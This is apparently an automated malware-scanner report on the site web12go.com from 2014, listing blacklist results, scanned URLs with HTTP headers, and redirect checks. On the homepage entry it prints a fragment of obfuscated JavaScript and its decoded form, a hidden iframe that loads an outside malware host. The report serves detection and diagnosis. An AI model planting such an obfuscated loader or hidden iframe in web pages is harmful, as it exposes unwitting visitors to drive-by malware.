Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=web12go.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web12go.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://web12go.com/ | 200 OK Content-Length: 2507 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c265607b11i49b96735c2c6e(i49b96735c3053){ function i49b96735c3439(){var i49b96735c3824=16;return i49b96735c3824;} return (parseInt(i49b96735c3053,i49b96735c3439()));}function i49b96735c3ff0(i49b96735c43da){ function i49b96735c5377(){var i49b96735c575f=2;return i49b96735c575f;} var i49b96735c481a='';i49b96735c61e6=String.fromCharCode;for(i49b96735c4f96=0;i49b96735c4f96<i49b96735c43da.length;i49b96735c4f96+=i49b96735c5377()){ i49b96735c481a+=(i49b96735c61e6(c265607b11i49b96735c2c6e(i49 Decoded script: <iframe name=c26 src='http://malwaretracksystem.com/?'+Math.round(Math.random()*124218)+'5ee499417' width=309 height=402 style='visibility:hidden'></iframe> Antivirus reports:
| ||
http://web12go.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 03 Oct 2014 00:30:29 GMT Location: http://www.xel.nl/pagina-niet-gevonden Server: Apache Vary: Accept-Encoding Content-Length: 222 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.xel.nl/pagina-niet-gevonden | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 03 Oct 2014 00:30:24 GMT Pragma: no-cache Location: https://www.xel.nl/pagina-niet-gevonden Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.xel.nl/xmlrpc.php | clean |
https://www.xel.nl/pagina-niet-gevonden | 404 Not Found Content-Length: 18977 Content-Type: text/html | clean |
https://www.xel.nl/wp-content/cache/minify/000000/LclBDoAgDADBD5kWPPqbog3SgEWKCf7eaDzu7N57tQWRhAZE1ZiZajJYtXyGOQVDOS9uN3rwDua_oKQDxCaHg3PhLRGKYVDt1hvVdz8.js?ddb85c | 200 OK Content-Length: 122088 Content-Type: application/x-javascript | clean |
http://web12go.com/controlcenter | HTTP/1.1 302 Found Connection: close Date: Fri, 03 Oct 2014 00:30:32 GMT Location: http://www.xel.nl/pagina-niet-gevonden Server: Apache Vary: Accept-Encoding Content-Length: 222 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.xel.nl/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 03 Oct 2014 00:30:26 GMT Pragma: no-cache Location: https://www.xel.nl/test404page.js Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.xel.nl/xmlrpc.php | clean |
https://www.xel.nl/test404page.js | 404 Not Found Content-Length: 18978 Content-Type: text/html | clean |
https://www.xel.nl/ | 200 OK Content-Length: 26506 Content-Type: text/html | clean |
https://www.xel.nl/controlcenter | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 03 Oct 2014 00:30:29 GMT Location: https://www.xel.nl/controlcenter/ Server: Apache Vary: Accept-Encoding Content-Length: 241 Content-Type: text/html; charset=iso-8859-1 | clean |
https://www.xel.nl/controlcenter/ | 200 OK Content-Length: 4206 Content-Type: text/html | clean |
https://www.xel.nl/controlcenter/res/mootools-1.2-core.js | 200 OK Content-Length: 96542 Content-Type: application/javascript | clean |
https://www.xel.nl/res/mootools-1.2-more.js | 404 Not Found Content-Length: 18988 Content-Type: text/html | clean |
https://www.xel.nl//webmail.xel.nl/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 03 Oct 2014 00:30:32 GMT Pragma: no-cache Location: https://www.xel.nl/webmail.xel.nl/ Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: https://www.xel.nl/xmlrpc.php | clean |
https://www.xel.nl/webmail.xel.nl/ | 404 Not Found Content-Length: 18972 Content-Type: text/html | clean |
https://www.xel.nl/domeinregistratie-bij-xel-media | 200 OK Content-Length: 26161 Content-Type: text/html | clean |
https://www.xel.nl/domeinnaam-extensies | 200 OK Content-Length: 28732 Content-Type: text/html | clean |
https://www.xel.nl/domeindiensten | 200 OK Content-Length: 25076 Content-Type: text/html | clean |
https://www.xel.nl/domeinnaam-verhuizen | 200 OK Content-Length: 24010 Content-Type: text/html | clean |
https://www.xel.nl/domeinregistratie-diensten-uitbreiden | 200 OK Content-Length: 20062 Content-Type: text/html | clean |
https://www.xel.nl//www.xel.nl/helpdesk/domeinnaam/wat-is-een-domeinnaam/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Fri, 03 Oct 2014 00:30:40 GMT Pragma: no-cache Location: https://www.xel.nl/helpdesk/wat-is-een-domeinnaam/ Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: https://www.xel.nl/xmlrpc.php | clean |
https://www.xel.nl/helpdesk/wat-is-een-domeinnaam/ | 200 OK Content-Length: 21385 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: web12go.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 00:30:29 GMT
Accept-Ranges: bytes
ETag: "78d6c-9cb-464f15db6ce40"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2507
Content-Type: text/html
Last-Modified: Thu, 12 Mar 2009 19:55:29 GMT
...2507 bytes of data.
GET / HTTP/1.1
Host: web12go.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 00:30:29 GMT
Accept-Ranges: bytes
ETag: "78d6c-9cb-464f15db6ce40"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2507
Content-Type: text/html
Last-Modified: Thu, 12 Mar 2009 19:55:29 GMT
...2507 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: web12go.com
Referer: http://www.google.com/search?q=web12go.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: web12go.com
Referer: http://www.google.com/search?q=web12go.com
Result:
The result is similar to the first query. There are no suspicious redirects found.